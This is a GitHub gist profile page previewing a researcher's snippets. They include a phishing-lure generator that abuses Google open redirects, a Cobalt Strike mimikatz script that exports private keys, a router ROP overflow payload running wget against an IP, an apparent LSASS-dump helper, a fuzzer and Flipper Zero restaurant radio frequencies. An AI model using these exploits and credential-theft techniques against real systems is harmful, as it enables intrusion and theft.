Skip to content

Instantly share code, notes, and snippets.

View OlivierLaflamme's full-sized avatar
:shipit:
؁؁؁؁؁؁؁؁؁؁؁؁؁؁🏴 403 Forbidden؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁🚩؁؁؁؁؁؁؁؁؁

Boschko OlivierLaflamme

:shipit:
؁؁؁؁؁؁؁؁؁؁؁؁؁؁🏴 403 Forbidden؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁؁🚩؁؁؁؁؁؁؁؁؁
View GitHub Profile
@OlivierLaflamme
OlivierLaflamme / google_lure.py
Created December 1, 2022 03:18 — forked from ustayready/google_lure.py
Generate phishing lures that exploit open-redirects from www.google.com using Google Docs
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from apiclient import errors
import re
from bs4 import BeautifulSoup as Soup
#!/usr/bin/env python3
"""
How to use:
Run this script out of /tmp in a seperate cmd (CMD-A)
leave this running CRTL+C if you want to kill it of `ps aux` find the PID the `kill -9 [PID]`
Step1: chmod +x peuse_cpu_crash.py
Step2: python3 peuse_cpu_crash.py
#!/bin/bash
echo "Hello World"
from boofuzz import *
IP = "192.168.0.5"
PORT = 80
def check_response(target, fuzz_data_logger, session, *args, **kwargs):
fuzz_data_logger.log_info("Checking test case response...")
try:
response = target.recv(512)
except:
@OlivierLaflamme
OlivierLaflamme / mmimikatz.cna
Created September 21, 2022 22:50 — forked from tothi/mmimikatz.cna
multi-command mimikatz functionality in a Cobalt Strike beacon
#
# multi-command mimikatz in a Cobalt Strike beacon extending the built-in mimikatz functionality
#
# cmd separator is |
#
# practical example: export machine certificates (including non-exportable private key :)):
#
# mmimikatz "crypto::capi|crypto::certificates /systemstore:local_machine /store:my /export"
#
url = "http://%s:80/goform/exeCommand"%(host)
libc=0x409a7000
godget1=0x00018298 #pop r3 pc
godget1 = struct.pack("< I",godget1+libc)
system=0x0005A270
system = struct.pack("< I", system+libc)
command="wget 192.168.174.136"
godget2 = 0x00040cb8 # mov r0 sp; blx r3
godget2 = struct.pack("< I", godget2 + libc)
password = "A" * 444+".gif"+godget1+system+godget2+command
@OlivierLaflamme
OlivierLaflamme / criss_de_tabarnak.py
Created September 6, 2022 13:17
IDA function resolving piece of fucking shit
from idaapi import *
from idc import * baseaddr = 0x10000 start = 0x301E64 + baseaddr end = 0x3293b4 + baseaddr
ea = start
while ea <= end:
create_strlit(Dword(ea), BADADDR)
func_name = get_strlit_contents(Dword(ea))
if func_name:
func_name = str (func_name)
#include <cstdio>
#include <windows.h>
#include <DbgHelp.h>
#include <iostream>
#include <TlHelp32.h>
#include <stdio.h>
#pragma comment(lib,"Dbghelp.lib")
typedef HRESULT(WINAPI* _MiniDumpW)(
DWORD arg1, DWORD arg2, PWCHAR cmdline);
@OlivierLaflamme
OlivierLaflamme / frequencies.txt
Created May 9, 2022 14:59
FlipperZero fast food frequencies
Restaurant Customer Clerk
Arbys 30.8400 154.5700
31.0000 170.3050
457.5500 467.7750
460.8875 465.8875
461.0375 466.0375
Bo Jangles 33.4000 154.5400
Boston Market 33.1600 154.5150
<script>
bb = new MSBlobBuilder();
bb.append("test data 2");
window.navigator.msSaveOrOpenBlob(bb.getBlob(),"testing2.txt");
</script>